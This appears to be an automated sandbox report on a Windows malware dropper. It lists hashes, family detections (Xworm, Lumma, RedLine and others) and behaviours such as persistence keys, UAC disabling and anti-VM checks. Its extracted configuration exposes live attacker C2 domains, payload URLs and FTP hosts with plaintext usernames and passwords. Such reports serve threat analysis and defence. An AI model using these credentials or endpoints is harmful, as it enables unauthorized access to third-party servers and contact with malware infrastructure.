Resubmissions
28-11-2024 02:19
241128-cr9sks1kht 1027-11-2024 21:08
241127-zyzyaawqgn 1027-11-2024 20:16
241127-y145caymbs 1027-11-2024 20:13
241127-yzlxdavlen 1027-11-2024 19:53
241127-yl61dsxpcs 1027-11-2024 19:38
241127-ycrjcaxkfx 1027-11-2024 19:03
241127-xqsswsslej 1027-11-2024 19:03
241127-xqf44aslcr 327-11-2024 19:02
241127-xpxqfsslan 327-11-2024 18:32
241127-w6pkqs1mek 10Analysis
-
max time kernel
892s -
max time network
1191s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
26-11-2024 18:49
Static task
static1
Behavioral task
behavioral1
Sample
4363463463464363463463463.exe
Resource
win11-20241007-en
Behavioral task
behavioral2
Sample
New Text Document mod.exe
Resource
win11-20241007-en
General
-
Target
New Text Document mod.exe
-
Size
8KB
-
MD5
69994ff2f00eeca9335ccd502198e05b
-
SHA1
b13a15a5bea65b711b835ce8eccd2a699a99cead
-
SHA256
2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2
-
SHA512
ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3
-
SSDEEP
96:y7ov9wc1dN1Unh3EHJ40CUJCrQt0LpCBIW12nEtgpH9GIkQYQoBNw9fnmK5iLjTv:yZyTFJfCB20LsBIW12n/eIkQ2BNg5S1
Malware Config
Extracted
http://176.113.115.178/FF/2.png
Extracted
http://176.113.115.178/FF/3.png
Extracted
http://176.113.115.178/Windows-Update
Extracted
http://176.113.115.178/FF/1.png
Extracted
Protocol: ftp- Host:
208.199.140.5 - Port:
21 - Username:
user - Password:
elephant
Extracted
Protocol: ftp- Host:
87.106.59.6 - Port:
21 - Username:
user - Password:
killer
Extracted
Protocol: ftp- Host:
38.180.98.11 - Port:
21 - Username:
ftp - Password:
Salam
Extracted
Protocol: ftp- Host:
159.220.53.17 - Port:
21 - Username:
administrator - Password:
008400
Extracted
Protocol: ftp- Host:
217.128.206.32 - Port:
21 - Username:
user - Password:
U9000
Extracted
Protocol: ftp- Host:
40.118.234.37 - Port:
21 - Username:
user - Password:
TEST
Extracted
Protocol: ftp- Host:
45.6.128.38 - Port:
21 - Username:
ftp - Password:
BMWM5
Extracted
Protocol: ftp- Host:
45.252.250.56 - Port:
21 - Username:
administrator - Password:
Test123
Extracted
Protocol: ftp- Host:
118.218.200.59 - Port:
21 - Username:
root
Extracted
Protocol: ftp- Host:
151.80.27.67 - Port:
21 - Username:
admin - Password:
ubqe
Extracted
Protocol: ftp- Host:
207.5.52.67 - Port:
21 - Username:
admin - Password:
abcd1234
Extracted
xworm
5.0
68.178.207.33:7000
sSM7p4MT4JctLnRS
-
install_file
USB.exe
Extracted
lumma
https://powerful-avoids.sbs
https://motion-treesz.sbs
https://disobey-curly.sbs
https://leg-sate-boat.sbs
https://story-tense-faz.sbs
https://blade-govern.sbs
https://occupy-blushi.sbs
https://frogs-severz.sbs
https://push-hook.cyou
https://p3ar11fter.sbs
https://3xp3cts1aim.sbs
https://owner-vacat10n.sbs
https://peepburry828.sbs
https://p10tgrace.sbs
https://befall-sm0ker.sbs
https://librari-night.sbs
https://processhol.sbs
https://cook-rain.sbs
https://crib-endanger.sbs
https://faintbl0w.sbs
https://300snails.sbs
https://bored-light.sbs
https://3xc1aimbl0w.sbs
https://pull-trucker.sbs
https://fleez-inc.sbs
https://thicktoys.sbs
https://frogmen-smell.sbs
Extracted
xworm
3.1
18.181.154.24:7000
w8DsMRIhXrOmk0Gn
-
Install_directory
%AppData%
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 6 IoCs
resource yara_rule behavioral2/files/0x0009000000025b80-145.dat family_xworm behavioral2/memory/4808-152-0x0000000000900000-0x000000000090E000-memory.dmp family_xworm behavioral2/memory/972-1714-0x0000000000400000-0x0000000000410000-memory.dmp family_xworm behavioral2/files/0x001900000002ace2-17145.dat family_xworm behavioral2/files/0x001900000002ad70-18148.dat family_xworm behavioral2/files/0x001900000002ae1f-18995.dat family_xworm -
Detects ZharkBot payload 1 IoCs
ZharkBot is a botnet written C++.
resource yara_rule behavioral2/files/0x001900000002ab9d-11032.dat zharkcore -
Lokibot family
-
Lumma family
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,C:\\Users\\Admin\\Music\\Windows Security Health Host.exe," reg.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
resource yara_rule behavioral2/files/0x001900000002ad64-18077.dat family_redline behavioral2/files/0x001a00000002ad6f-18137.dat family_redline -
Redline family
-
SectopRAT payload 1 IoCs
resource yara_rule behavioral2/files/0x001a00000002ad6f-18137.dat family_sectoprat -
Sectoprat family
-
Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
description pid Process procid_target PID 1880 created 2072 1880 WerFault.exe 523 PID 17172 created 8068 17172 WerFault.exe 780 PID 12444 created 7272 12444 WerFault.exe 819 -
Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
description pid Process procid_target PID 4232 created 2556 4232 AddInProcess32.exe 41 PID 4952 created 3200 4952 Reynolds.com 52 PID 1496 created 2556 1496 rh.exe 41 PID 2008 created 2072 2008 svchost.exe 523 PID 11800 created 11832 11800 svchost.exe 747 PID 11800 created 3340 11800 svchost.exe 745 PID 11800 created 12232 11800 svchost.exe 751 PID 11800 created 8068 11800 svchost.exe 780 PID 11800 created 7272 11800 svchost.exe 819 PID 11800 created 13484 11800 svchost.exe 822 -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" powershell.exe -
Xworm family
-
Zharkbot family
-
Contacts a large (6390) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rh.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ L.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rodda.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ lum250.exe -
Blocklisted process makes network request 10 IoCs
flow pid Process 243 5072 powershell.exe 244 3604 powershell.exe 245 1128 mshta.exe 246 3840 powershell.exe 5800 13420 rundll32.exe 5898 13420 rundll32.exe 5899 13420 rundll32.exe 5900 13420 rundll32.exe 5914 13420 rundll32.exe 5915 13420 rundll32.exe -
pid Process 17504 Process not Found 3744 powershell.exe 3220 powershell.exe 3724 Process not Found 2260 powershell.exe 1720 powershell.exe 3660 powershell.exe 4804 powershell.exe 2040 powershell.exe 8524 powershell.exe 8884 powershell.exe 9560 powershell.exe 13128 Process not Found 3616 powershell.exe 3604 powershell.exe 5072 powershell.exe 3840 powershell.exe 1968 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\drivers\QAssist.sys Gwogw.exe -
Indicator Removal: Network Share Connection Removal 1 TTPs 11 IoCs
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.
pid Process 3144 net.exe 1332 net.exe 17752 cmd.exe 5840 net.exe 5620 net.exe 4420 net.exe 11952 net.exe 12500 net.exe 12372 net.exe 5144 cmd.exe 672 net.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QAssist\ImagePath = "system32\\DRIVERS\\QAssist.sys" Gwogw.exe -
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral2/files/0x001900000002ab99-3154.dat net_reactor behavioral2/files/0x001900000002ab9a-4926.dat net_reactor -
Checks BIOS information in registry 2 TTPs 12 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Mig.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rodda.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion lum250.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rh.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion LB31.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion LB31.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion L.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rodda.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion lum250.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rh.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Mig.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion L.exe -
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Drops startup file 7 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\service.exe service.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url cmd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9758xBqgE1azKnB.lnk 9758xBqgE1azKnB.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9758xBqgE1azKnB.lnk 9758xBqgE1azKnB.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.lnk IMG001.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\service.exe service.exe -
Executes dropped EXE 64 IoCs
pid Process 792 fHR9z2C.exe 3376 filer.exe 4700 AmLzNi.exe 3756 Xworm%20V5.6.exe 4808 XClient.exe 900 333.exe 2140 VBVEd6f.exe 2972 test12.exe 4624 test6.exe 4888 test14.exe 4796 pantest.exe 2500 test9.exe 1028 test10-29.exe 2240 test19.exe 4004 test10.exe 2200 test_again4.exe 5056 test23.exe 1124 test5.exe 1944 test11.exe 4516 test20.exe 1208 test_again3.exe 2380 test16.exe 1256 test13.exe 4748 test_again2.exe 4912 test15.exe 1912 test18.exe 708 test21.exe 1216 test22.exe 2784 test8.exe 3664 test7.exe 3164 test-again.exe 424 test17.exe 2888 vg9qcBa.exe 2316 vg9qcBa.exe 3888 win.exe 684 x4lburt.exe 944 computerlead.exe 2224 9758xBqgE1azKnB.exe 4336 7mpPLxE.exe 2372 7mpPLxE.exe 1940 0fVlNye.exe 4952 Reynolds.com 2704 Reynolds.com 4712 IMG001.exe 1496 rh.exe 1864 file.exe 4496 tftp.exe 3900 IMG001.exe 972 9758xBqgE1azKnB.exe 1844 tftp.exe 4948 LB31.exe 4060 Mig.exe 5232 L.exe 5372 ttl.exe 2836 caspol.exe 756 caspol.exe 4568 rodda.exe 5960 caspol.exe 2360 caspol.exe 2072 chelentano.exe 1720 stories.exe 4676 stories.tmp 1480 shineencoder32.exe 5364 lum250.exe -
Identifies Wine through registry keys 2 TTPs 4 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Wine lum250.exe Key opened \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Wine rh.exe Key opened \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Wine L.exe Key opened \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Wine rodda.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Setup.evtx svchost.exe -
Loads dropped DLL 30 IoCs
pid Process 3900 IMG001.exe 3900 IMG001.exe 3900 IMG001.exe 3900 IMG001.exe 3900 IMG001.exe 3900 IMG001.exe 3900 IMG001.exe 3900 IMG001.exe 3900 IMG001.exe 3900 IMG001.exe 3900 IMG001.exe 4676 stories.tmp 1480 shineencoder32.exe 3900 IMG001.exe 3900 IMG001.exe 3900 IMG001.exe 3900 IMG001.exe 3900 IMG001.exe 3900 IMG001.exe 3900 IMG001.exe 3900 IMG001.exe 3900 IMG001.exe 3900 IMG001.exe 6736 ha7dur10.exe 13420 rundll32.exe 16364 E929.tmp.zx.exe 16364 E929.tmp.zx.exe 16364 E929.tmp.zx.exe 16364 E929.tmp.zx.exe 16364 E929.tmp.zx.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x001e00000002aee8-20140.dat themida behavioral2/files/0x001b00000002af2c-20409.dat themida -
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 91.211.247.248 -
resource yara_rule behavioral2/files/0x001a00000002abac-16677.dat vmprotect behavioral2/files/0x001c00000002ac1e-16847.dat vmprotect -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts rundll32.exe -
Accesses Microsoft Outlook profiles 1 TTPs 7 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook caspol.exe Key opened \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook caspol.exe Key opened \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook rundll32.exe Key opened \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 rundll32.exe Key opened \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 rundll32.exe Key opened \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 rundll32.exe Key opened \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook caspol.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 11 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\Administrator = "C:\\ProgramData\\Microsoft\\csrss.exe" win.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\A53CA96BD6C72604982160\\A53CA96BD6C72604982160.exe" msiexec.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\dlhost = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dlhost.exe" dlhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\A53CA96BD6C72604982160\\A53CA96BD6C72604982160.exe" MJPVgHw.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\A53CA96BD6C72604982160\\A53CA96BD6C72604982160.exe" audiodg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" x4lburt.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\9758xBqgE1azKnB = "C:\\Users\\Admin\\AppData\\Roaming\\9758xBqgE1azKnB.exe" 9758xBqgE1azKnB.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\NsMiner\\IMG001.exe" IMG001.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\NsMiner\\IMG001.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\kreon = "C:\\Users\\Admin\\AppData\\Local\\kreon.exe" random.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\service = "C:\\Users\\Admin\\AppData\\Roaming\\service.exe" service.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\E: IMG001.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
pid Process 5440 ARP.EXE 13940 cmd.exe 8700 ARP.EXE 2992 arp.exe 4076 cmd.exe -
Power Settings 1 TTPs 32 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 6172 Process not Found 2776 powercfg.exe 3604 powercfg.exe 4984 powercfg.exe 2060 powercfg.exe 17032 powercfg.exe 16952 powercfg.exe 5140 Process not Found 4172 powercfg.exe 6116 powercfg.exe 2284 powercfg.exe 12796 Process not Found 14768 Process not Found 6104 powercfg.exe 6096 powercfg.exe 6080 powercfg.exe 12644 powercfg.exe 12932 powercfg.exe 14256 powercfg.exe 12888 powercfg.exe 14088 powercfg.exe 13644 powercfg.exe 8132 Process not Found 11912 Process not Found 3604 cmd.exe 2668 powercfg.exe 8512 Process not Found 14520 Process not Found 2696 powercfg.exe 3936 powercfg.exe 13764 powercfg.exe 16912 powercfg.exe -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0006000000025b77-111.dat autoit_exe behavioral2/files/0x001900000002b077-27909.dat autoit_exe -
Drops file in System32 directory 10 IoCs
description ioc Process File created C:\Windows\SysWOW64\Gwogw.exe svchot%20-%20%E5%89%AF%E6%9C%AC.exe File opened for modification C:\Windows\SysWOW64\Gwogw.exe svchot%20-%20%E5%89%AF%E6%9C%AC.exe File opened for modification C:\Windows\System32\Tasks\dlhost svchost.exe File opened for modification C:\Windows\System32\Tasks\Sptuiitweq svchost.exe File opened for modification C:\Windows\System32\Tasks\service svchost.exe File opened for modification C:\Windows\system32\MRT.exe Mig.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\System32\Tasks\DenisOctavian svchost.exe File opened for modification C:\Windows\system32\MRT.exe LB31.exe -
Enumerates processes with tasklist 1 TTPs 11 IoCs
pid Process 6740 tasklist.exe 15708 tasklist.exe 10476 tasklist.exe 2984 Process not Found 6508 Process not Found 4752 tasklist.exe 14652 tasklist.exe 13268 tasklist.exe 13832 tasklist.exe 2008 Process not Found 1236 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
pid Process 1496 rh.exe 5232 L.exe 4568 rodda.exe 5364 lum250.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe 2660 Geek_se.exe -
Suspicious use of SetThreadContext 21 IoCs
description pid Process procid_target PID 2888 set thread context of 2316 2888 vg9qcBa.exe 181 PID 944 set thread context of 4232 944 computerlead.exe 192 PID 4336 set thread context of 2372 4336 7mpPLxE.exe 202 PID 4952 set thread context of 2704 4952 Reynolds.com 217 PID 2704 set thread context of 2124 2704 Reynolds.com 218 PID 2224 set thread context of 972 2224 9758xBqgE1azKnB.exe 249 PID 4948 set thread context of 3184 4948 LB31.exe 287 PID 4060 set thread context of 6136 4060 Mig.exe 320 PID 4060 set thread context of 1220 4060 Mig.exe 322 PID 4060 set thread context of 5168 4060 Mig.exe 325 PID 2836 set thread context of 756 2836 caspol.exe 336 PID 5960 set thread context of 2360 5960 caspol.exe 475 PID 6364 set thread context of 8752 6364 Windows Security Health Host.exe 769 PID 7132 set thread context of 7196 7132 bbwduuyjdzsp.exe 818 PID 7132 set thread context of 7272 7132 bbwduuyjdzsp.exe 819 PID 12900 set thread context of 13208 12900 bbwduuyjdzsp.exe 827 PID 11608 set thread context of 11680 11608 MJPVgHw.exe 838 PID 11608 set thread context of 2348 11608 MJPVgHw.exe 837 PID 11608 set thread context of 11700 11608 MJPVgHw.exe 839 PID 8180 set thread context of 14264 8180 qsjxfirefkza.exe 882 PID 8180 set thread context of 14316 8180 qsjxfirefkza.exe 885 -
resource yara_rule behavioral2/files/0x001d00000002ab9f-16584.dat upx behavioral2/files/0x004c00000002aba0-16632.dat upx -
Drops file in Windows directory 14 IoCs
description ioc Process File opened for modification C:\Windows\VatBukkake 0fVlNye.exe File opened for modification C:\Windows\nwdzwk.exe svcyr.exe File opened for modification C:\Windows\DownReceptor 0fVlNye.exe File opened for modification C:\Windows\CentralAvoiding 0fVlNye.exe File opened for modification C:\Windows\TeddySecretariat 0fVlNye.exe File opened for modification C:\Windows\OrganDiscretion 0fVlNye.exe File opened for modification C:\Windows\KeyboardsTwin 0fVlNye.exe File created C:\Windows\nwdzwk.exe svcyr.exe File opened for modification C:\Windows\ComfortSick 0fVlNye.exe File opened for modification C:\Windows\UruguayNorthern 0fVlNye.exe File opened for modification C:\Windows\MozambiqueAppropriate 0fVlNye.exe File created C:\Windows\Tasks\UAC.job schtasks.exe File opened for modification C:\Windows\IdeasApp 0fVlNye.exe File opened for modification C:\Windows\JoiningMazda 0fVlNye.exe -
Launches sc.exe 36 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4488 sc.exe 5732 sc.exe 12896 sc.exe 5684 sc.exe 17316 sc.exe 8632 Process not Found 13156 Process not Found 760 sc.exe 4504 sc.exe 6476 sc.exe 14688 Process not Found 15832 Process not Found 7784 Process not Found 4088 sc.exe 6892 sc.exe 3492 sc.exe 16352 Process not Found 14856 Process not Found 8620 Process not Found 18092 Process not Found 3408 sc.exe 4132 sc.exe 5812 sc.exe 6884 sc.exe 13880 Process not Found 10024 Process not Found 8552 Process not Found 4632 sc.exe 5892 sc.exe 6604 sc.exe 18300 Process not Found 3064 sc.exe 4836 sc.exe 5588 sc.exe 7444 sc.exe 9300 Process not Found -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Detects Pyinstaller 2 IoCs
resource yara_rule behavioral2/files/0x000e000000000667-2546.dat pyinstaller behavioral2/files/0x001900000002ad73-18170.dat pyinstaller -
Embeds OpenSSL 3 IoCs
Embeds OpenSSL, may be used to circumvent TLS interception.
resource yara_rule behavioral2/files/0x001900000002ad6e-18510.dat embeds_openssl behavioral2/files/0x001a00000002aec3-20059.dat embeds_openssl behavioral2/files/0x001a00000002af46-21568.dat embeds_openssl -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Program crash 12 IoCs
pid pid_target Process procid_target 1136 4232 WerFault.exe 192 4732 1496 WerFault.exe 224 12608 3340 WerFault.exe 745 12212 11832 WerFault.exe 747 8580 12232 WerFault.exe 751 8428 13484 WerFault.exe 822 13708 8168 WerFault.exe 1044 13788 7436 WerFault.exe 1050 16836 8036 WerFault.exe 1042 12848 16528 WerFault.exe 1112 15004 17068 WerFault.exe 1117 14852 4500 Process not Found 1249 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened 